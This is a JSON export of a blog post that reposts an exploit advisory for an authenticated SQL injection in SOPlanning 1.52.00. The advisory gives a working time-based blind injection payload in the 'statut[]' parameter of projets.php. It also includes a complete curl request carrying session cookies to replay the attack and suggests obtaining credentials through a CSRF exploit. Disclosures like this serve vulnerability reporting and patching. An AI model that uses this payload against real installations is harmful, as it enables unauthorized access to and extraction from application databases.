{"id":56648,"date":"2024-05-03T19:09:53","date_gmt":"2024-05-03T15:09:53","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178436\/soplanning15200-sql.txt"},"modified":"2024-05-03T19:09:53","modified_gmt":"2024-05-03T15:09:53","slug":"soplanning-1-52-00-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/soplanning-1-52-00-sql-injection\/","title":{"rendered":"SOPlanning 1.52.00 SQL Injection"},"content":{"rendered":"<p>Exploit Title: SOPlanning v1.52.00 &#8216;projets.php&#8217; SQLi<\/p>\n<p>Application: SOPlanning<\/p>\n<p>Version: 1.52.00<\/p>\n<p>Date: 4\/22\/24<\/p>\n<p>Exploit Author: Joseph McPeters (Liquidsky)<\/p>\n<p>Vendor Homepage: https:\/\/www.soplanning.org\/en\/<\/p>\n<p>Software Link: https:\/\/sourceforge.net\/projects\/soplanning\/<\/p>\n<p>Tested on: Linux<\/p>\n<p>CVE: Not yet assigned<\/p>\n<p>Description: SOPlanning v1.52.00 is vulnerable to Authenticated SQL Injection via the &#8216;projects.php&#8217; page.<\/p>\n<p>Instructions: Authenticate to the host, the credentials can be obtained using a CSRF exploit (more info included). Once valid credentials are obtained use either a GET\/POST request to send the valid parameters that equal to valid SQLi.<\/p>\n<p>Vulnerable request parameters for request to &#8220;\/www\/projets.php&#8221;:<\/p>\n<p>filtreGroupeProjet=1&amp;statut[]=todo&#8217;+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+&#8217;Liquidsky&#8217;=&#8217;Liquidsky&amp;rechercheProjet=test<\/p>\n<p>The above parameters can be sent as either a valid GET\/POST request to trigger the SQLi.<\/p>\n<p>Example Curl Request To Re-Test SQLi:<\/p>\n<p>curl -i -s -k -X $&#8217;POST&#8217; \\<br \/>-H $&#8217;Host: 127.0.0.1&#8242; -H $&#8217;User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&#8242; -H $&#8217;Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8&#8242; -H $&#8217;Accept-Language: en-US,en;q=0.5&#8242; -H $&#8217;Accept-Encoding: gzip, deflate, br&#8217; -H $&#8217;Content-Type: application\/x-www-form-urlencoded&#8217; -H $&#8217;Content-Length: 130&#8242; -H $&#8217;Origin: http:\/\/127.0.0.1&lt;http:\/\/127.0.0.1\/&gt;&#8217; -H $&#8217;Connection: close&#8217; -H $&#8217;Referer: http:\/\/127.0.0.1\/soplanning\/www\/projets.php&#8217; -H $&#8217;Upgrade-Insecure-Requests: 1&#8242; -H $&#8217;Sec-Fetch-Dest: document&#8217; -H $&#8217;Sec-Fetch-Mode: navigate&#8217; -H $&#8217;Sec-Fetch-Site: same-origin&#8217; -H $&#8217;Sec-Fetch-User: ?1&#8242; \\<br \/>-b $&#8217;dateDebut=23\/04\/2024; dateFin=23\/06\/2024; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; yposProjets=33; PHPSESSID=ovpbclvbc87uh7anfbq2luf9bi; soplanningplanning_=hhrtf0rgs562vm8rhn5i641481; baseLigne=users; baseColonne=jours; afficherTableauRecap=1; masquerLigneVide=0; statut_projet=%5B%22abort%22%2C%22archive%22%2C%22done%22%2C%22progress%22%2C%22todo%22%5D&#8217; \\<br \/>&#8211;data-binary $&#8217;filtreGroupeProjet=1&amp;statut[]=todo\\&#8217;+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+\\&#8217;Liquidsky\\&#8217;=\\&#8217;Liquidsky&amp;rechercheProjet=test&#8217; \\<br \/>$&#8217;http:\/\/127.0.0.1\/soplanning\/www\/projets.php&#8217;<\/p>\n<p>Note: Cookies need to be authenticated and request needs to be valid for valid SQLi. This curl request can be used with a proxy to reconstruct a valid request.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Title: SOPlanning v1.52.00 &#8216;projets.php&#8217; SQLi Application: SOPlanning Version: 1.52.00 Date: 4\/22\/24 Exploit Author: Joseph McPeters (Liquidsky) Vendor Homepage: https:\/\/www.soplanning.org\/en\/ Software Link: https:\/\/sourceforge.net\/projects\/soplanning\/ Tested on: Linux CVE: Not yet assigned Description: SOPlanning v1.52.00 is vulnerable to Authenticated SQL Injection via the &#8216;projects.php&#8217; page. Instructions: Authenticate to the host, the credentials can be obtained using a &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56648","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56648","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56648"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56648\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56648"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56648"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56648"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}